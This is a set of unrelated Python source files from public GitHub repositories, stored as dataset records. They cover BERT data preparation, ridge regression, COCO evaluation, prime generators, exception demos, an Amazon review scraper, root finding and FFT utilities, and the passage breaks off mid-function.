i:\n                        chosen_paragraph_index = random.choice(paragraph_index_list)\n                    tokens_b = random.choice(paragraphs[chosen_paragraph_index])\n\n                # 1 '<cls>' token and 2 '<sep>' tokens\n                redundant_len = len(tokens_a) + len(tokens_b) + 3 - max_len\n                if redundant_len > 0:\n                    left = int(len(tokens_a) / (len(tokens_a) + len(tokens_b)) * redundant_len)\n                    right = redundant_len - left\n                    tokens_a = tokens_a[left:]\n                    tokens_b = tokens_b[:len(tokens_b) - right]\n\n                # combine tokens\n                tokens = [vocab['<cls>']] + tokens_a + [vocab['<sep>']] + tokens_b + [vocab['<sep>']]\n                # 0 and 1 are marking segment A and B, respectively\n                segments = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)\n                sentence_pair_data.append({\n                    'tokens': tokens,\n                    'segments': segments,\n                    'is_next': is_next\n                })\n        logger.info(f'Got {len(sentence_pair_data)} sentence pairs.')\n        return sentence_pair_data\n\n    @staticmethod\n    def _setup_data(sentence_pair_data, vocab):\n        \"\"\"\n        Setup data for bert training.\n        :param sentence_pair_data: List[dict].\n        :param vocab: torchtext.vocab.Vocab\n        :return: List[dict].\n        \"\"\"\n        logger.info(f'Setup data for bert training...')\n        for data in tqdm(sentence_pair_data):\n            tokens = data['tokens']\n            invalid_tokens = set(vocab.lookup_indices(['<pad>', '<mask>', '<cls>', '<sep>']))\n            candidate_index = [i for i, token in enumerate(tokens)\n                               if token not in invalid_tokens]\n\n            # 15% of random tokens are predicted in the masked language modeling task\n            num_predict = max(1, int(len(tokens) * 0.15))\n            index_predict = list()\n            token_predict = list()\n            random.shuffle(candidate_index)\n            for index in candidate_index[:num_predict]:\n                if random.random() < 0.8:\n                    # 80% of the time: replace the word with the '<mask>' token\n                    masked_token = vocab['<mask>']\n                elif random.random() < 0.5:\n                    # 10% of the time: keep the word unchanged\n                    masked_token = tokens[index]\n                else:\n                    # 10% of the time: replace the word with a random word\n                    while True:\n                        masked_token = random.randint(0, len(vocab) - 1)\n                        if masked_token not in invalid_tokens:\n                            break\n                    \n                tokens[index] = masked_token\n                index_predict.append(index)\n                token_predict.append(masked_token)\n\n            data['tokens'] = tokens\n            data['predict_index'] = index_predict\n            data['predict_token'] = token_predict\n        return sentence_pair_data\n\n    def __getitem__(self, index):\n        data = self._data[index]\n        valid_len = len(data['tokens'])\n        pad_len = self._max_len - valid_len\n        max_num_predict = int(self._max_len * 0.15)\n        predict_pad_len = max_num_predict - len(data['predict_index'])\n        return {\n            'tokens': torch.tensor(data['tokens'] + [self._vocab['<pad>']] * pad_len, dtype=torch.int64),\n            'segments': torch.tensor(data['segments'] + [0] * pad_len, dtype=torch.int),\n            'pad_mask': torch.tensor([0] * valid_len + [1] * pad_len, dtype=torch.int),\n            'is_next': torch.tensor(data['is_next'], dtype=torch.int64),\n            'predict_index': torch.tensor(data['predict_index'] + [0] * predict_pad_len, dtype=torch.int64),\n            'predict_token': torch.tensor(data['predict_token'] + [0] * predict_pad_len, dtype=torch.int64),\n            # 1 for real prediction slots, 0 for the padded slots\n            'predict_mask': torch.tensor([1] * len(data['predict_index']) + [0] * predict_pad_len, dtype=torch.float)\n        }\n\n    def __len__(self):\n        return len(self._data)\n\n    def get_vocab(self):\n        return self._vocab\n\n\nclass WikiText2(BertDataset):\n    \"\"\"WikiText2 dataset for bert embedding training.\"\"\"\n\n    def _get_raw_paragraphs(self, data_path, **kwargs):\n        paragraphs = list()\n        # use train split only\n        for paragraph in tqdm(torchtext.datasets.WikiText2(data_path, split='train')):\n            # treat . as the end of a sentence.\n            lines = paragraph.strip().split(' . 
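The 80/10/10 masking rule implemented in _setup_data above can be isolated into a small standalone function for testing. This sketch simplifies by not excluding special tokens from the random replacement, which the original does:

import random

def mask_token(token, vocab_size, mask_id):
    # 80%: replace with the mask token; 10%: keep; 10%: random token.
    r = random.random()
    if r < 0.8:
        return mask_id
    elif r < 0.9:
        return token
    else:
        return random.randint(0, vocab_size - 1)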
')\n if len(lines) < 2:\n continue\n\n # tokenize word\n paragraph = list()\n for line in lines:\n tokens = line.strip().split()\n if tokens:\n paragraph.append(tokens + ['.'])\n\n if len(paragraph) > 1:\n paragraphs.append(paragraph)\n return paragraphs\n\n\nclass WikiText2Test(WikiText2):\n \"\"\"WikiText2 dataset for bert embedding training test.\"\"\"\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n paragraphs = super()._get_raw_paragraphs(data_path)\n logger.info(f'Randomly select 1024 pieces of data for test.')\n random.shuffle(paragraphs)\n return paragraphs[:1024]\n\n\nclass Squad2(BertDataset):\n \"\"\"Squad2 dataset for bert embedding training.\"\"\"\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n paragraphs = list()\n tokenizer = torchtext.data.utils.get_tokenizer('basic_english')\n # use train split only\n for passage, question, _, _ in tqdm(torchtext.datasets.SQuAD2(data_path, split='train')):\n passage_list = [passage]\n for char in '.!?':\n new_passage_list = list()\n for p in passage_list:\n new_p_list = p.split(char)\n for new_p in new_p_list[:-1]:\n new_p += char\n new_passage_list.extend(new_p_list)\n passage_list = new_passage_list\n paragraphs.append([tokenizer(p) for p in [question] + passage_list])\n\n return paragraphs\n\n\nDATASETS = {\n 'wikitext2_test': WikiText2Test,\n 'wikitext2': WikiText2,\n 'squad2': Squad2\n}\n\n\ndef build_bert_dataset(**kwargs):\n name = kwargs['name']\n if name in DATASETS:\n logger.info(f'Building bert dataset {name}...')\n return DATASETS[name](**kwargs)\n else:\n raise ValueError(f'Invalid bert dataset name: {name}.')\n","repo_name":"jishuguang/language","sub_path":"language/lm/dataset/bert_dataset.py","file_name":"bert_dataset.py","file_ext":"py","file_size_in_byte":9493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13552700202","text":"\n# class element:\n# def __init__(self):\n# self.name = ()\n# self.symbol = ()\n# self.mass = ()\n# self.number =()\n#\n#\n# configuration = ['1s2 2s2 2p6 3s2 3p6 4s2 3d6']\n#\n#\n#\n\nperiodic_table_dict = {1:{'name':'hydrogen','symbol':'H','mass':1.0079 } }\n","repo_name":"ProfessorKazarinoff/staticsite","sub_path":"content/code/periodic_table/periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"34456625541","text":"#computing a radial-basis kernel for the synthetic dataset.\nimport numpy as np\ndef radial_basis_transform(X, B, gamma=0.1):\n res=[]\n for i in range(len(X)):\n new=[]\n for j in range(len(B)): \n new.append(-gamma*((X[i]-B[j])**2))\n res.append(new)\n return np.exp(res)\n \n#training the model \n#Phi float(n, d): transformed data\n# y float(n, ): labels\n# lam float : regularization parameter\nimport numpy as np\ndef train_ridge_model(Phi, y, lam):\n a1=np.dot(Phi.transpose(),Phi)\n a2=(lam*np.identity(len(Phi.transpose()))) \n a3=np.add(a1,a2)\n res=np.linalg.inv(a3) \n return np.dot(res,np.dot(Phi.transpose(),y))\n\n#evaluating the performance on the transformed validation and test data.\nw = {} # Dictionary to store all the trained models\nvalidationErr = {} # Validation error of the models\ntestErr = {} # Test error of all the models\nlam=10**-3\nwhile lam<=10**3: # Iterate over polynomial degree\n Phi_trn = radial_basis_transform(X_trn,X_trn) # Transform training data into d dimensions\n w[lam] = train_ridge_model(Phi_trn, y_trn,lam) # Learn model on training 
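For the radial-basis record that begins above: each entry of the transformed design matrix is exp(-gamma * (x_i - b_j)^2) for basis centers b_j, and train_ridge_model is the usual closed form w = (Phi^T Phi + lam*I)^(-1) Phi^T y. A tiny self-contained check under those definitions (vectorized, unlike the loop version above):

import numpy as np

def rbf_features(X, B, gamma=0.1):
    # (n, m) matrix of exp(-gamma * (x_i - b_j)^2) for scalar inputs.
    return np.exp(-gamma * (X[:, None] - B[None, :]) ** 2)

X = np.array([0.0, 1.0, 2.0, 3.0])
y = np.sin(X)
Phi = rbf_features(X, X, gamma=1.0)
lam = 1e-3
w = np.linalg.solve(Phi.T @ Phi + lam * np.eye(Phi.shape[1]), Phi.T @ y)
print(np.allclose(Phi @ w, y, atol=1e-2))  # near-interpolation at small lambda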
data\n \n Phi_val = radial_basis_transform(X_val,X_trn) # Transform validation data into d dimensions\n validationErr[lam] = evaluate_model(Phi_val, y_val, w[lam]) # Evaluate model on validation data\n \n Phi_tst = radial_basis_transform(X_tst, X_trn) # Transform test data into d dimensions\n testErr[lam] = evaluate_model(Phi_tst, y_tst, w[lam]) # Evaluate model on test data\n lam=lam*10\n\n# Plot all the models -both learned and true\nplt.figure()\nplt.plot(validationErr.keys(), validationErr.values(), marker='o', linewidth=3, markersize=12)\nplt.plot(testErr.keys(), testErr.values(), marker='s', linewidth=3, markersize=12)\nplt.xlabel('Lambda', fontsize=16)\nplt.ylabel('Validation/Test error', fontsize=16)\nplt.xticks(list(validationErr.keys()), fontsize=12)\nplt.legend(['Validation Error', 'Test Error'], fontsize=16)\nplt.xscale(\"log\") \n\nplt.figure()\nplt.plot(x_true, y_true, marker='None', linewidth=5, color='k')\nlam=10**-3\nthis_list=list()\nwhile lam<=10**3:\n this_list.append(lam)\n X_lam = radial_basis_transform(x_true, X_trn)\n y_lam = X_lam @ w[lam]\n #print(w[lam])\n plt.plot(x_true, y_lam, marker='None', linewidth=2)\n lam=lam*10\nplt.legend(['true'] + this_list)\nplt.axis([-8, 8, -15, 15])\n\n#As lambda increases, linearity of model increases and vice versa.\n#minimum error is on lambda=10^-3\n#validationErr- minimum 46.160 on lambda=10^-3 \n#testErr- minimum 37.50 on lambda=10^-3 \n","repo_name":"rinkle26/MachineLearning","sub_path":"RadialBasis.py","file_name":"RadialBasis.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36608087579","text":"import copy\nimport os\nfrom argparse import ArgumentParser\nfrom multiprocessing import Pool\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\n\n\ndef _summarize(cocoEval, ap=1, iouThr=None, areaRng='all', maxDets=100 ):\n p = cocoEval.params\n iStr = ' {:<18} {} @[ IoU={:<9} | area={:>6s} | maxDets={:>3d} ] = {:0.3f}'\n titleStr = 'Average Precision' if ap == 1 else 'Average Recall'\n typeStr = '(AP)' if ap==1 else '(AR)'\n iouStr = '{:0.2f}:{:0.2f}'.format(p.iouThrs[0], p.iouThrs[-1]) \\\n if iouThr is None else '{:0.2f}'.format(iouThr)\n\n aind = [i for i, aRng in enumerate(p.areaRngLbl) if aRng == areaRng]\n mind = [i for i, mDet in enumerate(p.maxDets) if mDet == maxDets]\n if ap == 1:\n # dimension of precision: [TxRxKxAxM]\n s = cocoEval.eval['precision']\n # IoU\n if iouThr is not None:\n t = np.where(iouThr == p.iouThrs)[0]\n s = s[t]\n s = s[:,:,:,aind,mind]\n else:\n # dimension of recall: [TxKxAxM]\n s = cocoEval.eval['recall']\n if iouThr is not None:\n t = np.where(iouThr == p.iouThrs)[0]\n s = s[t]\n s = s[:,:,aind,mind]\n if len(s[s>-1])==0:\n mean_s = -1\n else:\n mean_s = np.mean(s[s>-1])\n print(iStr.format(titleStr, typeStr, iouStr, areaRng, maxDets, mean_s))\n return mean_s\n\n\ndef analyze_results(res_file,\n ann_file,\n areas=None):\n if areas:\n assert len(areas) == 3, '3 integers should be specified as areas, \\\n representing 3 area regions'\n\n cocoGt = COCO(ann_file)\n cocoDt = cocoGt.loadRes(res_file)\n imgIds = cocoGt.getImgIds()\n\n iou_type = 'bbox'\n cocoEval = COCOeval(\n copy.deepcopy(cocoGt), copy.deepcopy(cocoDt), iou_type)\n cocoEval.params.imgIds = imgIds\n if areas:\n cocoEval.params.areaRng = [[0**2, areas[2]], [0**2, areas[0]],\n [areas[0], areas[1]],\n [areas[1], areas[2]]]\n cocoEval.evaluate()\n 
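The --areas default in the COCO script above follows the standard COCO convention: objects under 32^2 = 1024 px^2 count as 'small', between 32^2 and 96^2 = 9216 as 'medium', and anything larger as 'large'. A sketch of the bucketing implied by the areaRng list built in analyze_results (boundary handling here is illustrative):

def area_bucket(area_px2, areas=(1024, 9216, 10_000_000_000)):
    # Mirrors [[0, all], [0, small], [small, medium], [medium, large]].
    small, medium, upper = areas
    if area_px2 < small:
        return 'small'
    elif area_px2 < medium:
        return 'medium'
    elif area_px2 < upper:
        return 'large'
    return 'out of range'

print(area_bucket(30 * 30), area_bucket(64 * 64), area_bucket(200 * 200))
# -> small medium large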
cocoEval.accumulate()\n    stats = np.zeros((10,))\n    stats[0] = _summarize(cocoEval, 1)\n    stats[1] = _summarize(cocoEval, 1, iouThr=.5, maxDets=cocoEval.params.maxDets[2])\n    stats[2] = _summarize(cocoEval, 1, iouThr=.5, areaRng='small', maxDets=cocoEval.params.maxDets[2])\n    stats[3] = _summarize(cocoEval, 1, iouThr=.5, areaRng='medium', maxDets=cocoEval.params.maxDets[2])\n    stats[4] = _summarize(cocoEval, 1, iouThr=.5,areaRng='large', maxDets=cocoEval.params.maxDets[2])\n    stats[5] = _summarize(cocoEval, 0, maxDets=cocoEval.params.maxDets[2])\n    stats[6] = _summarize(cocoEval, 0, iouThr=.5, maxDets=cocoEval.params.maxDets[2])\n    stats[7] = _summarize(cocoEval, 0, iouThr=.5, areaRng='small', maxDets=cocoEval.params.maxDets[2])\n    stats[8] = _summarize(cocoEval, 0, iouThr=.5, areaRng='medium', maxDets=cocoEval.params.maxDets[2])\n    stats[9] = _summarize(cocoEval, 0, iouThr=.5, areaRng='large', maxDets=cocoEval.params.maxDets[2])\n    \n\n\ndef main():\n    parser = ArgumentParser(description='COCO Error Analysis Tool')\n    parser.add_argument('result', help='result file (json format) path')\n    parser.add_argument(\n        '--ann',\n        default='data/coco/annotations/instances_val2017.json',\n        help='annotation file path')\n    parser.add_argument(\n        '--areas',\n        type=int,\n        nargs='+',\n        default=[1024, 9216, 10000000000],\n        help='area regions')\n    args = parser.parse_args()\n    analyze_results(\n        args.result,\n        args.ann,\n        areas=args.areas)\n\n\nif __name__ == '__main__':\n    main()\n\n\n","repo_name":"karpovaknn/defect_detection","sub_path":"tools/custom_coco_analysis.py","file_name":"custom_coco_analysis.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39605907037","text":"\"\"\"\n✔ Create a generator function.\n✔ The function generates N prime numbers,\nstarting from the number 2.\n✔ To check a number for primality, use the\nrule: «a number is prime if it is divisible evenly\nonly by one and by itself».\n\"\"\"\n\n\ndef is_simple(n: int) -> bool:\n    if n == 2:\n        return True\n    divisor = 2\n    while n % divisor != 0:\n        divisor += 1\n    return divisor == n\n\n\ndef simple_(n):\n    counter, iter_ = 0, 2\n    while counter < n:\n        if is_simple(iter_):\n            counter += 1\n            tmp = iter_\n            iter_ += 1\n            yield tmp\n        else:\n            iter_ += 1\n\n\ndef main():\n    n = int(input(\"n?\"))\n    a = iter(simple_(n))\n    m = n\n    while m:\n        print(next(a))\n        m -= 1\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem5/timeout_2.py","file_name":"timeout_2.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"13649257687","text":"# coding:utf-8\n# About exceptions, part 1: Exception and ZeroDivisionError\n#2021-12-05\n\ndef upper(str_data):\n    new_str = 'None~' # initialize the string first\n    try:\n        new_str = str_data.upper() # if the try body succeeds, new_str is reassigned; if not, control jumps to the except block\n    except Exception as e: # catch the generic exception: used when the exception type cannot be determined in advance\n        print('The program hit an error: {}'.format(e))\n    return new_str\n\nresult = upper(1) # raises an exception\nprint('result:', result) # returns the initial string 'None~'\nprint(\"____________________________\")\ndef test():\n    try:\n        print('123') # this line is printed\n        1 / 0\n        print('hello') # the error occurs right after 123 is printed, so this line never runs\n    except ZeroDivisionError as e: # catch a specific exception: used when the exception type is known (here: division by zero is not allowed in Python)\n        print(e)\n\n\ntest()\nprint(\"____________________________\")\n\ndef test1():\n    try:\n        print('hello')\n        print(name) # name is an undefined variable\n    except (ZeroDivisionError, NameError) as e: # to catch multiple exceptions, wrap the exception types in a tuple\n        print(e)\n        print(type(e))\n        
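The trial division in is_simple above walks every candidate divisor up to n; a standard speed-up (not in the original) is to stop at sqrt(n), since a composite n must have a factor no larger than its square root:

def is_prime(n: int) -> bool:
    # Trial division up to sqrt(n): O(sqrt(n)) instead of O(n).
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True

assert [x for x in range(2, 20) if is_prime(x)] == [2, 3, 5, 7, 11, 13, 17, 19]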
print(dir(e))\n\ntest1()\n\nprint(\"_______________ tests of several exception types below _________________\")\nclass Test(object):\n    pass\n\nt = Test()\ntry:\n    t.name\nexcept AttributeError as e:\n    print(e)\n\nd = {'name': '小慕'}\ntry:\n    d['age']\nexcept KeyError as e:\n    print('No matching key:', e)\n\nl = [1, 2, 3]\ntry:\n    l[5]\nexcept IndexError as e:\n    print(e)\n\nname = 'dewei'\ntry:\n    int(name)\nexcept ValueError as e:\n    print(e)\n\ndef test(a):\n    return a\n\ntry:\n    test()\nexcept TypeError as e:\n    print(e)\n","repo_name":"liujx2232/Python_Refresh","sub_path":"try_error/try_init1.py","file_name":"try_init1.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17276292253","text":"import scrapy\n\nclass CountriesSpider(scrapy.Spider): # spider class\n    name = 'countries'\n    allowed_domains = ['www.amazon.in'] # never add http\n    start_urls = ['https://www.amazon.in/Redmi-Sky-Blue-64GB-Storage/product-reviews/B08697N43N/'] # add https\n\n\n    def parse(self, response): # parse method to get response from spider\n        \n        \n        for i in response.css(\"[data-hook=review]\"): # attribute name and its value\n            items={} #dictionary\n            \n            items['title']=i.css('[data-hook=\"review-title\"] span ::text').get() #extracting data from selector object\n            items['review']=i.xpath('normalize-space(.//*[@data-hook=\"review-body\"])').get() #remove space by normalising \n            items['star']=i.css('[data-hook=\"review-star-rating\"] span ::text').get()\n            items['name']=i.css('.a-profile-name ::text').get()\n            \n            yield items\n\n        next_page = response.xpath('//a[contains(text(),\"Next page\")]/@href').get()\n        if next_page:\n            yield scrapy.Request(response.urljoin(next_page))\n        \n","repo_name":"tjjohn/Amazon-review-scraping","sub_path":"worldmeter/spiders/countries.py","file_name":"countries.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"31313153517","text":"\"\"\" An incremental search algorithm \"\"\"\nimport pdb\nimport numpy as np\n\ndef incremental_search(f, a, b, dx):\n    \"\"\"\n    :param f: The function to solve\n    :param a: The left boundary x-axis value\n    :param b: The right boundary x-axis value\n    :param dx: The incremental value in searching\n    :return: The x-axis value of the root,\n            number of iterations used\n    \"\"\"\n    fa = f(a) \n    c = a + dx \n    fc = f(c) \n    n = 1\n\n    # Just keep moving from the min until you hit zero (aka, sign changes) and return that val\n    # obviously very poor solution\n    while np.sign(fa) == np.sign(fc):\n        if a >= b:\n            return a - dx, n\n        \n        a = c\n        fa = fc\n        c = a + dx\n        fc = f(c)\n        n += 1\n\n    # edge cases where start points are roots\n    if fa == 0:\n        return a, n\n    elif fc == 0:\n        return c, n\n    else:\n        # assume mid point of a and c as answer\n        return (a + c)/2., n\n\nif __name__ == \"__main__\":\n    \"\"\"\n    The keyword 'lambda' creates an anonymous function\n    with input argument x\n    \"\"\"\n    y = lambda x: x**3 + 2.0*x**2 - 5.\n    root, iterations = incremental_search(y, -5., 5., 0.001)\n    print(\"Root is:\", root)\n    print(\"Iterations:\", iterations)","repo_name":"mccarvik/python_for_finance","sub_path":"books/mastering_pff/ch3/incremental_search.py","file_name":"incremental_search.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"26407352030","text":"'''\nRoutines for real-to-complex and complex-to-real FFTs. 
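Bisection is the usual improvement over the incremental search above: once a sign change is bracketed, it halves the interval instead of stepping linearly. A sketch with the same call convention (returns root estimate and iteration count); the tolerance is illustrative:

import numpy as np

def bisection(f, a, b, tol=1e-6):
    fa, fb = f(a), f(b)
    assert np.sign(fa) != np.sign(fb), "root must be bracketed"
    n = 0
    while (b - a) / 2.0 > tol:
        c = (a + b) / 2.0
        fc = f(c)
        if fc == 0:
            return c, n
        if np.sign(fa) == np.sign(fc):
            a, fa = c, fc
        else:
            b, fb = c, fc
        n += 1
    return (a + b) / 2.0, n

root, its = bisection(lambda x: x**3 + 2.0*x**2 - 5., -5., 5.)
print(root, its)  # same root as above, in roughly 23 halvings instead of thousands of steps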
Adapted from pixell and mnms.\nBut differs at some critical points, mainly in the definition of the flat-sky lx.\n'''\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\nimport ducc0\nfrom pixell import enmap, wcsutils\n\nfrom optweight import type_utils, mat_utils\n\ndef rfft(imap, fmap):\n    '''\n    Real-to-complex FFT.\n\n    Parameters\n    ----------\n    imap : (..., ny, nx) ndmap\n        Map to transform.\n    fmap : (..., ny, nx//2+1) complex ndmap\n        Output buffer.\n\n    Raises\n    ------\n    ValueError\n        If input and output map have inconsistent shapes.\n    '''\n\n    ny, nx = imap.shape[-2:]\n    if fmap.shape != imap.shape[:-2] + (ny, nx // 2 + 1):\n        raise ValueError(\n            f'Inconsistent shapes: imap : {imap.shape}, fmap : {fmap.shape}')\n    if fmap.dtype != type_utils.to_complex(imap.dtype):\n        raise TypeError(\n            f'imap.dtype : {imap.dtype} and fmap.dtype : {fmap.dtype} do not match')\n    \n    ducc0.fft.r2c(np.asarray(imap), axes=[-2, -1], inorm=1, out=np.asarray(fmap),\n                  nthreads=0)\n\ndef irfft(fmap, omap):\n    '''\n    Complex-to-real FFT.\n\n    Parameters\n    ----------\n    fmap : (..., ny, nx//2+1) complex ndmap\n        Input Fourier coefficients.\n    omap : (..., ny, nx) ndmap\n        Output buffer.\n\n    Raises\n    ------\n    ValueError\n        If input and output map have inconsistent shapes.\n    '''\n\n    ny, nx = omap.shape[-2:]\n    if fmap.shape != omap.shape[:-2] + (ny, nx // 2 + 1):\n        raise ValueError(\n            f'Inconsistent shapes: fmap : {fmap.shape}, omap : {omap.shape}')\n    if fmap.dtype != type_utils.to_complex(omap.dtype):\n        raise TypeError(\n            f'omap.dtype : {omap.dtype} and fmap.dtype : {fmap.dtype} do not match')\n\n    ducc0.fft.c2r(np.asarray(fmap), axes=[-2, -1], forward=False, inorm=1,\n                  lastsize=omap.shape[-1], out=np.asarray(omap), nthreads=0)\n    \ndef allocate_fmap(shape, dtype, fill_value=0):\n    '''\n    Allocate an array suitable for the output of rfft.\n\n    Parameters\n    ----------\n    shape : tuple\n        Input shape of enmap.\n    dtype : type, optional\n        Type of input map.\n    fill_value : scalar, optional\n        Value to fill new array with.\n\n    Returns\n    -------\n    omap : (..., ny, nx//2+1) complex array\n        New array for 2D Fourier coefficients.\n    '''\n    \n    preshape = shape[:-2]\n    ny, nx = shape[-2:]\n\n    return np.full(preshape + (ny, nx // 2 + 1), fill_value, \n                   dtype=type_utils.to_complex(dtype))\n\ndef allocate_map(fshape, dtype, fill_value=0):\n    '''\n    Allocate an array suitable for the output of irfft.\n\n    Parameters\n    ----------\n    fshape : tuple\n        Input shape of fmap: (..., ly, lx).\n    dtype : type, optional\n        Type of input fmap.\n    fill_value : scalar, optional\n        Value to fill new array with.\n\n    Returns\n    -------\n    omap : (..., ly, 2 * (lx -1) + 1) real array\n        New array.\n\n    Notes\n    -----\n    This always results in an array with an odd-length x axis. From the\n    shape of the fmap it is unknown whether the input map was even or odd\n    in the x direction.\n    '''\n    \n    preshape = fshape[:-2]\n    ly, lx = fshape[-2:]\n\n    return np.full(preshape + (ly, 2 * (lx - 1) + 1), fill_value, \n                   dtype=type_utils.to_real(dtype))\n\ndef laxes_real(shape, wcs):\n    '''\n    Compute ell_x and ell_y axes corresponding to a given enmap geometry.\n\n    Arguments\n    ---------\n    shape : tuple\n        Shape of geometry.\n    wcs : astropy.wcs.WCS object\n        WCS object describing geometry.\n\n    Returns\n    -------\n    ly : (nly) array\n        Wavenumbers in y direction.\n    lx : (nlx) array\n        Wavenumbers in x direction.\n\n    Notes\n    -----\n    This definition differs from the one used in pixell and mnms. We \n    attempt no correction for sky curvature. 
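A round-trip sketch for the rfft/irfft pair above (assumes pixell and ducc0 are installed; the geometry values are arbitrary and enmap.geometry/enmap.enmap usage here is my assumption, not from this module):

import numpy as np
from pixell import enmap

shape, wcs = enmap.geometry(pos=(0, 0), shape=(64, 128), res=np.radians(0.5))
imap = enmap.enmap(np.random.randn(*shape), wcs)     # random real-valued map

fmap = allocate_fmap(imap.shape, imap.dtype)         # (..., ny, nx//2+1) complex
rfft(imap, fmap)
omap = imap * 0
irfft(fmap, omap)
print(np.allclose(imap, omap))                       # symmetric inorm=1 norms round-trip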
Our `ly` only matches up \n with the harmonic `m` on the equator of a cylindrical pixelization.\n '''\n\n step = np.radians(wcs.wcs.cdelt[::-1])\n ly = np.fft.fftfreq(shape[-2], step[0]) * 2 * np.pi\n lx = np.fft.rfftfreq(shape[-1], step[1]) * 2 * np.pi\n\n return ly, lx\n\ndef laxes2lmap(ly, lx, dtype=np.float64):\n '''\n Return maps of all the wavenumbers corresponding to a given enmap geometry.\n\n Arguments\n ---------\n ly : (nly) array\n Wavenumbers in y direction.\n lx : (nlx) array\n Wavenumbers in x direction.\n\n Returns\n -------\n lmap : (2, nly, nlx) array\n Maps of ell_y and ell_x wavenumbers.\n '''\n\n lmap = np.empty((2, ly.size, lx.size), dtype=dtype)\n lmap[0] = ly[:,np.newaxis]\n lmap[1] = lx[np.newaxis,:]\n\n return lmap\n\ndef lmap_real(shape, wcs, dtype=np.float64):\n '''\n Return maps of all the wavenumbers corresponding to a given enmap geometry.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n dtype : type, optional\n Type of ouput array.\n\n Returns\n -------\n lmap : (2, nly, nlx) array\n Maps of ell_y and ell_x wavenumbers.\n '''\n\n ly, lx = laxes_real(shape, wcs)\n return laxes2lmap(ly, lx, dtype=dtype)\n\ndef laxes2modlmap(ly, lx, dtype=np.float64):\n '''\n Return a map of all the abs wavenumbers in the fourier transform\n of a map with the given shape and wcs.\n\n Arguments\n ---------\n ly : (nly) array\n Wavenumbers in y direction.\n lx : (nlx) array\n Wavenumbers in x direction.\n dtype : type, optional\n Type of ouput array.\n\n Returns\n -------\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n '''\n \n lmap = laxes2lmap(ly, lx, dtype=dtype)\n return np.sum(lmap ** 2, axis=0) ** 0.5\n \ndef modlmap_real(shape, wcs, dtype=np.float64):\n '''\n Return a map of all the abs wavenumbers in the fourier transform\n of a map with the given shape and wcs.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n dtype : type, optional\n Type of ouput array.\n\n Returns\n -------\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n '''\n\n ly, lx = laxes_real(shape, wcs)\n return laxes2modlmap(ly, lx, dtype=dtype)\n\ndef lwcs_real(shape, wcs):\n '''\n Build world coordinate system for Fourier space (with reality symmetry) given\n enmap geometry.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n\n Returns\n -------\n lwcs : astropy.wcs.WCS object\n WCS object describing Fourier space geometry.\n '''\n\n lres = 2 * np.pi / (np.radians(wcs.wcs.cdelt[::-1]) * shape[-2:])\n lres[-1] = abs(lres[-1])\n ny = shape[-2]\n \n return wcsutils.explicit(crpix=[0,ny//2+1], crval=[0,0], cdelt=lres[::-1])\n\ndef lbin(fmap, modlmap, bsize=None):\n '''\n Bin Fourier-space map into radial bins.\n \n Arguments\n ---------\n fmap : (..., nly, nlx) array.\n Input 2D Fourier map.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n bsize : float, optional\n Radial bin size. 
Defaults to resolution in ell of input map.\n\n Returns\n -------\n fbin : (..., nbin) array\n Radially binned input.\n bins : (nbin) array\n Bins.\n '''\n\n if bsize is None:\n bsize = min(abs(modlmap[0,1]), abs(modlmap[1,0]))\n\n return enmap._bin_helper(fmap, modlmap, bsize)\n\ndef fmul(fmap, fmat2d=None, fmat1d=None, ells=None, modlmap=None,\n out=None):\n '''\n Compute f'[...,i,ly,lx] = m[i,j,ly,lx] f[...,j,ly,lx] matrix\n multiplication.\n \n Parameters\n ----------\n fmap : (..., nly, nlx) complex array.\n Input 2D Fourier map.\n fmat2d : (npol, npol, nly, nlx) or (npol, nly, nlx) array, optional\n Matrix, if diagonal only the diagal suffices.\n fmat1d : (npol, npol, nell) or (npol, nly, nell) array, optional\n Matrix, if diagonal only the diagal suffices.\n ells : (nell) array, optional\n Array with multipoles, can be non-integer, needed for `fmat1d`.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers, needed for `fmat1d`.\n out : (..., nly, nlx) array, optional\n Output array.\n\n Returns\n -------\n out : (..., nly, nlx) complex array\n Result from matrix multiplication.\n '''\n \n if fmat2d is not None and fmat1d is not None:\n raise ValueError('Cannot have both fmat2d and fmat1d')\n\n if fmat1d is not None:\n fmat2d = cl2flat(fmat1d, ells, modlmap)\n \n return fmul_2d(fmap, fmat2d, out=out)\n\ndef fmul_2d(fmap, fmat2d, out=None):\n '''\n Compute 